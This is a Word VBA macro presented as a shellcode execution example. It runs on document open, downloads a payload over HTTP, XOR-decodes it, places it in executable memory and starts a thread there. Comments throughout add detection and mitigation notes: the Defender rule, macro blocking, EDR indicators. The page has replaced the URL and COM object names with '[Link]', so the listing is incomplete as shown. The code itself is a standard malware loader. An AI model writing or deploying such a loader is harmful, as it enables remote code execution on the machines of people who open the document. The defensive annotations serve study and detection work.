
VBA Shellcode Execution Example


' Win32 imports used by ExecutePayload. They are declared only when the VBA7
' conditional-compilation constant is set; no #Else branch is present.
' Detection note: a document macro whose Declare statements import VirtualAlloc,
' RtlMoveMemory and CreateThread together is a well-known static indicator of
' in-memory code execution. The Microsoft Defender attack surface reduction rule
' "Block Win32 API calls from Office macros" targets this pattern.
#If VBA7 Then

' kernel32!VirtualAlloc: reserves/commits a memory region with caller-chosen protection.
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _


ByVal lpAddress As LongPtr, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr

' kernel32!RtlMoveMemory: raw byte copy from a VBA variable to an arbitrary address.
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" Alias


"RtlMoveMemory" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As Long

' kernel32!CreateThread: starts a thread at a caller-supplied address.
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _


ByVal lpThreadAttributes As LongPtr, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
ByVal lpParameter As LongPtr, _
ByVal dwCreationFlags As Long, _
ByRef lpThreadId As Long) As LongPtr
#End If

' Word auto-macro: runs when the document is opened with macros enabled.
' Its only action is to call ExecutePayload, so no user interaction beyond
' opening the file (and allowing macros) is involved.
' Mitigation note: blocking macros in files that carry Mark of the Web, or
' allowing only signed macros, prevents this entry point from firing.
Sub AutoOpen()
ExecutePayload
End Sub

' Document Open event handler: a second auto-run entry point that also does
' nothing but call ExecutePayload.
' Triage note: static macro analysis reports auto-exec names such as
' AutoOpen and Document_Open; the same macro-blocking policy covers both.
Sub Document_Open()
ExecutePayload
End Sub

' Fetches a byte array over HTTP, XORs every byte with a fixed one-byte key,
' copies the result into newly allocated executable memory and starts a thread
' at that address.
' NOTE(review): every "[Link]" below is a substitution made by the hosting page;
' the original URL, COM ProgID and object member names are not visible here, so
' the listing is incomplete as shown.
' Behaviours a defender can key on, in order: an outbound HTTP GET issued by the
' process hosting the macro, a read-write-execute allocation, and a thread whose
' start address is in private memory not backed by a module.
Sub ExecutePayload()
Dim url As String
Dim http As Object
Dim shellcode() As Byte
Dim i As Long
Dim mem As LongPtr
Dim threadID As Long
Dim xorKey As Byte

url = "[Link]
xorKey = &H55 ' Must match the key used in XOR encryption
' The key is hard-coded in cleartext, so single-byte XOR is obfuscation only:
' an analyst holding the macro can decode a captured response body with it.

' Late-bound COM object (ProgID redacted by the page) used for the download.
Set http = CreateObject("[Link]")


' Third argument False: the request is synchronous.
[Link] "GET", url, False
[Link]

' Presumably an HTTP status check (member name redacted) - confirm against the original.
If [Link] = 200 Then


shellcode = [Link]

' XOR decrypt
' The body travels XOR-encoded, so content signatures written for the decoded
' bytes will not match it on the wire.


For i = 0 To UBound(shellcode)
shellcode(i) = shellcode(i) Xor xorKey
Next i

' Allocate memory and copy shellcode
' &H1000 Or &H2000 = MEM_COMMIT Or MEM_RESERVE; &H40 = PAGE_EXECUTE_READWRITE.
' A private RWX region created by an Office host process is a strong EDR signal.


mem = VirtualAlloc(0, UBound(shellcode), &H1000 Or &H2000, &H40)
RtlMoveMemory mem, shellcode(0), UBound(shellcode)

' Run shellcode
' The new thread starts at the allocated address and runs inside the process
' hosting the macro, so no child process is created by this step.


CreateThread 0, 0, mem, 0, 0, threadID
End If
End Sub
